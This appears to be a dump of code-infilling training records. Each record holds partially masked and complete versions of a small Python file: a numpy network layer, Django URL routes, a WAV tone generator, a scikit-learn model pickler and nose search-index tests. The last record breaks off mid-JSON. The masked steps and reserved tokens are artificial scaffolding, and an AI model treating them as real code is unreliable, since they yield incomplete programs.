if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
<|reserved_special_token_0|>
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.
pre_activation)
return self.activation_layer
<|reserved_special_token_0|>
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
def __init_parameters(self, size_of_previous_layer):
self.weights = np.random.randn(self.current_layer_dim,
size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)
self.bias = np.zeros((self.current_layer_dim, 1))
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.
pre_activation)
return self.activation_layer
def __backward_linear(self, d_pre_activation):
m = self.activation.shape[1]
self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)
self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)
self.d_activation = np.dot(self.weights.T, d_pre_activation)
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
def __init_parameters(self, size_of_previous_layer):
self.weights = np.random.randn(self.current_layer_dim,
size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)
self.bias = np.zeros((self.current_layer_dim, 1))
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.
pre_activation)
return self.activation_layer
def __backward_linear(self, d_pre_activation):
m = self.activation.shape[1]
self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)
self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)
self.d_activation = np.dot(self.weights.T, d_pre_activation)
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
def update_parameters(self, delta_weights, delta_bias):
self.weights -= delta_weights
self.bias -= delta_bias
<|reserved_special_token_1|>
import numpy as np
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return (self.weights is None) or (self.bias is None)
def __init_parameters(self, size_of_previous_layer):
self.weights = np.random.randn(self.current_layer_dim, size_of_previous_layer) \
* np.sqrt(2. / size_of_previous_layer)
self.bias = np.zeros((self.current_layer_dim, 1))
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.pre_activation)
return self.activation_layer
def __backward_linear(self, d_pre_activation):
m = self.activation.shape[1]
self.d_weights = 1. / m * np.dot(d_pre_activation, self.activation.T)
self.d_bias = 1. / m * np.sum(d_pre_activation, axis=1, keepdims=True)
self.d_activation = np.dot(self.weights.T, d_pre_activation)
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
def update_parameters(self, delta_weights, delta_bias):
self.weights -= delta_weights
self.bias -= delta_bias
|
flexible
|
{
"blob_id": "389ccddcbe2214ae5c012bc82a404a81942792d8",
"index": 1770,
"step-1": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n <mask token>\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n <mask token>\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.\n pre_activation)\n return self.activation_layer\n <mask token>\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n\n def __init_parameters(self, size_of_previous_layer):\n self.weights = np.random.randn(self.current_layer_dim,\n size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)\n self.bias = np.zeros((self.current_layer_dim, 1))\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.\n pre_activation)\n return self.activation_layer\n\n def __backward_linear(self, d_pre_activation):\n m = self.activation.shape[1]\n self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)\n self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)\n self.d_activation = np.dot(self.weights.T, d_pre_activation)\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n\n def __init_parameters(self, size_of_previous_layer):\n self.weights = np.random.randn(self.current_layer_dim,\n size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)\n self.bias = np.zeros((self.current_layer_dim, 1))\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.\n pre_activation)\n return self.activation_layer\n\n def __backward_linear(self, d_pre_activation):\n m = self.activation.shape[1]\n self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)\n self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)\n self.d_activation = np.dot(self.weights.T, d_pre_activation)\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n\n def update_parameters(self, delta_weights, delta_bias):\n self.weights -= delta_weights\n self.bias -= delta_bias\n",
"step-5": "import numpy as np\n\n\nclass LayerBase(object):\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return (self.weights is None) or (self.bias is None)\n\n def __init_parameters(self, size_of_previous_layer):\n self.weights = np.random.randn(self.current_layer_dim, size_of_previous_layer) \\\n * np.sqrt(2. / size_of_previous_layer)\n self.bias = np.zeros((self.current_layer_dim, 1))\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.pre_activation)\n return self.activation_layer\n\n def __backward_linear(self, d_pre_activation):\n m = self.activation.shape[1]\n\n self.d_weights = 1. / m * np.dot(d_pre_activation, self.activation.T)\n self.d_bias = 1. / m * np.sum(d_pre_activation, axis=1, keepdims=True)\n self.d_activation = np.dot(self.weights.T, d_pre_activation)\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n\n def update_parameters(self, delta_weights, delta_bias):\n self.weights -= delta_weights\n self.bias -= delta_bias\n",
"step-ids": [
4,
7,
9,
10,
12
]
}
|
[
4,
7,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',
'reports'), ('^sampling_points$', 'sampling_points'), (
'^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (
'^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (
'^export_pdf$', 'pdf_view'))
<|reserved_special_token_1|>
from django.conf.urls.defaults import *
urlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',
'reports'), ('^sampling_points$', 'sampling_points'), (
'^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (
'^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (
'^export_pdf$', 'pdf_view'))
<|reserved_special_token_1|>
from django.conf.urls.defaults import *
## reports view
urlpatterns = patterns('commtrack_reports.views',
(r'^commtrackreports$', 'reports'),
(r'^sampling_points$', 'sampling_points'),
(r'^commtrack_testers$', 'testers'),
(r'^date_range$', 'date_range'),
(r'^create_report$', 'create_report'),
(r'^export_csv$', 'export_csv'),
(r'^export_pdf$', 'pdf_view'),
# (r'^test$', 'test'),
)
|
flexible
|
{
"blob_id": "6d244b719200ae2a9c1a738e746e8c401f8ba4e2",
"index": 3342,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',\n 'reports'), ('^sampling_points$', 'sampling_points'), (\n '^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (\n '^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (\n '^export_pdf$', 'pdf_view'))\n",
"step-3": "from django.conf.urls.defaults import *\nurlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',\n 'reports'), ('^sampling_points$', 'sampling_points'), (\n '^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (\n '^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (\n '^export_pdf$', 'pdf_view'))\n",
"step-4": "from django.conf.urls.defaults import *\n\n## reports view\nurlpatterns = patterns('commtrack_reports.views',\n (r'^commtrackreports$', 'reports'),\n (r'^sampling_points$', 'sampling_points'),\n (r'^commtrack_testers$', 'testers'),\n (r'^date_range$', 'date_range'),\n (r'^create_report$', 'create_report'),\n (r'^export_csv$', 'export_csv'),\n (r'^export_pdf$', 'pdf_view'),\n# (r'^test$', 'test'),\n\n)\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import struct
import sys
import wave
sys.path.insert(0, os.path.dirname(__file__))
C5 = 523
B4b = 466
G4 = 392
E5 = 659
F5 = 698
VOLUME = 12000
notes = [
[VOLUME, C5],
[VOLUME, C5],
[VOLUME, B4b],
[VOLUME, C5],
[0, C5],
[VOLUME, G4],
[0, C5],
[VOLUME, G4],
[VOLUME, C5],
[VOLUME, F5],
[VOLUME, E5],
[VOLUME, C5],
]
from fade import fade
from gain import gain
from repeat import repeat
from square import square_wave
all_samples = []
quarter_second = 44100 // 4
for volume, frequency in notes:
samples = square_wave(int(44100 / frequency // 2))
samples = gain(samples, volume)
samples = repeat(samples, quarter_second)
samples = fade(samples, quarter_second)
all_samples.extend(samples)
all_samples = [int(sample) for sample in all_samples]
w = wave.open('music.wav', 'wb')
w.setnchannels(1)
w.setsampwidth(2)
w.setframerate(44100)
w.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))
|
normal
|
{
"blob_id": "4fb563985bd99599e88676e167ee84a95b018aba",
"index": 5414,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.insert(0, os.path.dirname(__file__))\n<mask token>\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\n<mask token>\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-3": "<mask token>\nsys.path.insert(0, os.path.dirname(__file__))\nC5 = 523\nB4b = 466\nG4 = 392\nE5 = 659\nF5 = 698\nVOLUME = 12000\nnotes = [[VOLUME, C5], [VOLUME, C5], [VOLUME, B4b], [VOLUME, C5], [0, C5],\n [VOLUME, G4], [0, C5], [VOLUME, G4], [VOLUME, C5], [VOLUME, F5], [\n VOLUME, E5], [VOLUME, C5]]\n<mask token>\nall_samples = []\nquarter_second = 44100 // 4\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\nall_samples = [int(sample) for sample in all_samples]\nw = wave.open('music.wav', 'wb')\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-4": "import os\nimport struct\nimport sys\nimport wave\nsys.path.insert(0, os.path.dirname(__file__))\nC5 = 523\nB4b = 466\nG4 = 392\nE5 = 659\nF5 = 698\nVOLUME = 12000\nnotes = [[VOLUME, C5], [VOLUME, C5], [VOLUME, B4b], [VOLUME, C5], [0, C5],\n [VOLUME, G4], [0, C5], [VOLUME, G4], [VOLUME, C5], [VOLUME, F5], [\n VOLUME, E5], [VOLUME, C5]]\nfrom fade import fade\nfrom gain import gain\nfrom repeat import repeat\nfrom square import square_wave\nall_samples = []\nquarter_second = 44100 // 4\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\nall_samples = [int(sample) for sample in all_samples]\nw = wave.open('music.wav', 'wb')\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-5": "import os\nimport struct\nimport sys\nimport wave\n\nsys.path.insert(0, os.path.dirname(__file__))\n\nC5 = 523\nB4b = 466\nG4 = 392\nE5 = 659\nF5 = 698\nVOLUME = 12000\n\nnotes = [\n [VOLUME, C5],\n [VOLUME, C5],\n [VOLUME, B4b],\n [VOLUME, C5],\n [0, C5],\n [VOLUME, G4],\n [0, C5],\n [VOLUME, G4],\n [VOLUME, C5],\n [VOLUME, F5],\n [VOLUME, E5],\n [VOLUME, C5],\n]\n\nfrom fade import fade\nfrom gain import gain\nfrom repeat import repeat\nfrom square import square_wave\n\nall_samples = []\nquarter_second = 44100 // 4\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\n\nall_samples = [int(sample) for sample in all_samples]\n\nw = wave.open('music.wav', 'wb')\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Run(datasetFile):
userFile = open(datasetFile, 'r')
instanceList = []
instanceCount = 0
featureCount = 0
for instance in userFile:
tempStr = instance
instanceCount += 1
for entry in tempStr.split(','):
instanceList.append(entry)
featureCount += 1
userFile.close()
featureCount = int(featureCount / instanceCount)
dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount
).reshape(instanceCount, featureCount)
for instance in range(instanceCount):
dataFull[instance][featureCount - 1] = dataFull[instance][
featureCount - 1].rstrip('\n')
features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(
featureCount - 1, instanceCount).T
target = np.array(dataFull.T[featureCount - 1]).astype(float)
isClassification = False
for i in range(len(target)):
if int(target[i]) == 0 or int(target[i]) == 1:
isClassification = True
else:
isClassification = False
break
mlModel = None
if isClassification:
mlModel = LogisticRegression().fit(features, target)
else:
mlModel = LinearRegression().fit(features, target)
tmpFileName, file_exe = os.path.splitext(datasetFile)
newFilePath = tmpFileName + 'MODEL' + '.sav'
pickle.dump(mlModel, open(newFilePath, 'wb'))
<|reserved_special_token_1|>
from sklearn.linear_model import LinearRegression, LogisticRegression
import numpy as np
import pickle
import os
def Run(datasetFile):
userFile = open(datasetFile, 'r')
instanceList = []
instanceCount = 0
featureCount = 0
for instance in userFile:
tempStr = instance
instanceCount += 1
for entry in tempStr.split(','):
instanceList.append(entry)
featureCount += 1
userFile.close()
featureCount = int(featureCount / instanceCount)
dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount
).reshape(instanceCount, featureCount)
for instance in range(instanceCount):
dataFull[instance][featureCount - 1] = dataFull[instance][
featureCount - 1].rstrip('\n')
features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(
featureCount - 1, instanceCount).T
target = np.array(dataFull.T[featureCount - 1]).astype(float)
isClassification = False
for i in range(len(target)):
if int(target[i]) == 0 or int(target[i]) == 1:
isClassification = True
else:
isClassification = False
break
mlModel = None
if isClassification:
mlModel = LogisticRegression().fit(features, target)
else:
mlModel = LinearRegression().fit(features, target)
tmpFileName, file_exe = os.path.splitext(datasetFile)
newFilePath = tmpFileName + 'MODEL' + '.sav'
pickle.dump(mlModel, open(newFilePath, 'wb'))
<|reserved_special_token_1|>
from sklearn.linear_model import LinearRegression, LogisticRegression
import numpy as np
import pickle
import os
def Run(datasetFile):
    """Fit a model to a comma-separated dataset and pickle it to disk.

    Each line of *datasetFile* is one instance; the last column is the
    target.  When every target value truncates to 0 or 1 the data is
    treated as a binary-classification problem (LogisticRegression),
    otherwise a LinearRegression is fitted.  The trained model is written
    next to the input file as "<basename>MODEL.sav".
    """
    # Read every comma-separated entry, counting instances and total entries.
    instanceList = []
    instanceCount = 0
    featureCount = 0
    with open(datasetFile, "r") as userFile:  # context manager: file is always closed
        for instance in userFile:
            instanceCount += 1
            for entry in instance.split(','):
                instanceList.append(entry)
                featureCount += 1

    # featureCount accumulated across all rows; normalize to columns per row.
    featureCount = int(featureCount / instanceCount)

    # Shape the flat entry list into an (instances x features) string array.
    # (The original flattened-then-reshaped twice; one reshape suffices.)
    dataFull = np.asarray(instanceList).reshape(instanceCount, featureCount)

    # The last entry of each row still carries the line's trailing newline.
    for instance in range(instanceCount):
        dataFull[instance][featureCount - 1] = dataFull[instance][featureCount - 1].rstrip("\n")

    # Direct slicing is equivalent to the original transpose/reshape/transpose.
    features = dataFull[:, :featureCount - 1].astype(float)
    target = dataFull[:, featureCount - 1].astype(float)

    # Classification iff there is data and every target truncates to 0 or 1
    # (matches the original loop, which int()-truncated each value).
    isClassification = len(target) > 0 and all(int(v) in (0, 1) for v in target)

    if isClassification:
        mlModel = LogisticRegression().fit(features, target)
    else:
        mlModel = LinearRegression().fit(features, target)

    # Persist the fitted model; 'with' fixes the file handle leaked by the
    # original pickle.dump(mlModel, open(newFilePath, 'wb')).
    tmpFileName, file_exe = os.path.splitext(datasetFile)
    newFilePath = tmpFileName + "MODEL" + ".sav"
    with open(newFilePath, "wb") as modelFile:
        pickle.dump(mlModel, modelFile)
|
flexible
|
{
"blob_id": "ee7efea569b685ad8d6922e403421227e9ea6922",
"index": 6277,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Run(datasetFile):\n userFile = open(datasetFile, 'r')\n instanceList = []\n instanceCount = 0\n featureCount = 0\n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n userFile.close()\n featureCount = int(featureCount / instanceCount)\n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount\n ).reshape(instanceCount, featureCount)\n for instance in range(instanceCount):\n dataFull[instance][featureCount - 1] = dataFull[instance][\n featureCount - 1].rstrip('\\n')\n features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(\n featureCount - 1, instanceCount).T\n target = np.array(dataFull.T[featureCount - 1]).astype(float)\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n mlModel = None\n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target)\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + 'MODEL' + '.sav'\n pickle.dump(mlModel, open(newFilePath, 'wb'))\n",
"step-3": "from sklearn.linear_model import LinearRegression, LogisticRegression\nimport numpy as np\nimport pickle\nimport os\n\n\ndef Run(datasetFile):\n userFile = open(datasetFile, 'r')\n instanceList = []\n instanceCount = 0\n featureCount = 0\n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n userFile.close()\n featureCount = int(featureCount / instanceCount)\n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount\n ).reshape(instanceCount, featureCount)\n for instance in range(instanceCount):\n dataFull[instance][featureCount - 1] = dataFull[instance][\n featureCount - 1].rstrip('\\n')\n features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(\n featureCount - 1, instanceCount).T\n target = np.array(dataFull.T[featureCount - 1]).astype(float)\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n mlModel = None\n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target)\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + 'MODEL' + '.sav'\n pickle.dump(mlModel, open(newFilePath, 'wb'))\n",
"step-4": "from sklearn.linear_model import LinearRegression, LogisticRegression\nimport numpy as np\nimport pickle\nimport os\n\ndef Run(datasetFile):\n \n # Get file from user\n userFile = open(datasetFile, \"r\")\n \n # Starter list of all instances of the data file\n instanceList = []\n instanceCount = 0\n featureCount = 0 \n \n # put all instances in data file line by line into instanceList[] \n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n \n # Be sure to seperate the entries by commas\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n \n # Close file\n userFile.close()\n \n # Adjust size of feature count\n featureCount = int(featureCount / instanceCount)\n \n # With data now seperated we can make the numpy array and transpose it \n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount).reshape(instanceCount, featureCount)\n \n # Get rid of all the '\\n' in array\n for instance in range(instanceCount):\n dataFull[instance][featureCount-1] = dataFull[instance][featureCount-1].rstrip(\"\\n\")\n \n features = np.array(dataFull.T[0:featureCount-1]).astype(float).reshape(featureCount-1, instanceCount).T\n target = np.array(dataFull.T[featureCount-1]).astype(float)\n \n # Setup Machine Learning\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n \n mlModel = None\n \n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target) \n\n \n # Make new file for Model data\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + \"MODEL\" + \".sav\"\n pickle.dump(mlModel, open(newFilePath, 'wb'))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Copyright (C) 2014 Abhay Vardhan. All Rights Reserved.
"""
Author: abhay.vardhan@gmail.com
We have not yet added tests which exercise the HTTP GET directly.
"""
__author__ = 'abhay'
from nose.tools import *
import test_data
import search_index
class TestClass:
    """Verifies index construction and bounding-box search over the sample data."""

    def setUp(self):
        # Rebuild the indexes from scratch before every test.
        search_index.buildIndex(test_data.sample_food_trucks_data)

    def tearDown(self):
        pass

    def _result_ids(self, start=None, stop=None):
        """Object ids for a slice of the indexed results, in index order."""
        return [entry['objectid'] for entry in search_index.all_results[start:stop]]

    def _search_ids(self, query, lat_lo, lng_lo, lat_hi, lng_hi):
        """Run a bounding-box search and project the hits onto object ids."""
        hits = search_index.search(query, lat_lo, lng_lo, lat_hi, lng_hi)
        return [entry['objectid'] for entry in hits]

    def test_case_query_index(self):
        assert_equals(search_index.query_index, test_data.sample_query_index)

    def test_case_lat_index(self):
        assert_equals(search_index.sorted_latitudes,
                      test_data.sample_latitude_index)

    def test_case_lng_index(self):
        assert_equals(search_index.sorted_longitudes,
                      test_data.sample_longitude_index)

    def test_case_search_query(self):
        assert_equals(search_index.searchQuery('cold'), {2, 3})

    def test_case_search_query_case(self):
        # Matching must be case-insensitive.
        assert_equals(search_index.searchQuery('Cold'), {2, 3})

    def test_case_search_find_le(self):
        arr = [10, 20, 30, 40]
        assert_equals(search_index.find_le(arr, 20), 1)
        assert_equals(search_index.find_le(arr, 20.1), 1)
        assert_equals(search_index.find_le(arr, 30), 2)

    def test_case_search_find_ge(self):
        arr = [10, 20, 30, 40]
        assert_equals(search_index.find_ge(arr, 20), 1)
        assert_equals(search_index.find_ge(arr, 30), 2)
        assert_equals(search_index.find_ge(arr, 20.1), 2)

    def test_case_search_lat(self):
        arr = [10, 20, 30, 40]
        assert_equals(search_index.find_array_range_matching(arr, 20, 30), {1, 2})
        assert_equals(search_index.find_array_range_matching(arr, 19, 35), {1, 2})
        assert_equals(search_index.find_array_range_matching(arr, 9, 50), {0, 1, 2, 3})

    def test_case_search1(self):
        # The full bounding box returns every indexed truck.
        assert_equals(
            self._search_ids('', 37.7860914634251, -122.398658184604,
                             37.7901490737255, -122.3934729318),
            self._result_ids())

    def test_case_search2(self):
        assert_equals(
            self._search_ids('', 37.7879000978181, -122.398658184604,
                             37.7901490737255, -122.394594036205),
            self._result_ids(0, 3))

    def test_case_search3(self):
        assert_equals(
            self._search_ids('', 37.787, -122.398658184604,
                             37.7901490737255, -122.394),
            self._result_ids(0, 3))

    def test_case_search4(self):
        # A text query narrows the bounding-box hits.
        assert_equals(
            self._search_ids('cold', 37.7860914634251, -122.398658184604,
                             37.7901490737255, -122.3934729318),
            self._result_ids(2, 4))

    def test_case_search5(self):
        assert_equals(
            self._search_ids('cheese', 37.7860914634251, -122.398658184604,
                             37.7901490737255, -122.3934729318),
            self._result_ids(1, 2))
|
normal
|
{
"blob_id": "a9c0251b3422457b2c0089b70308a70b09cfa0e0",
"index": 7276,
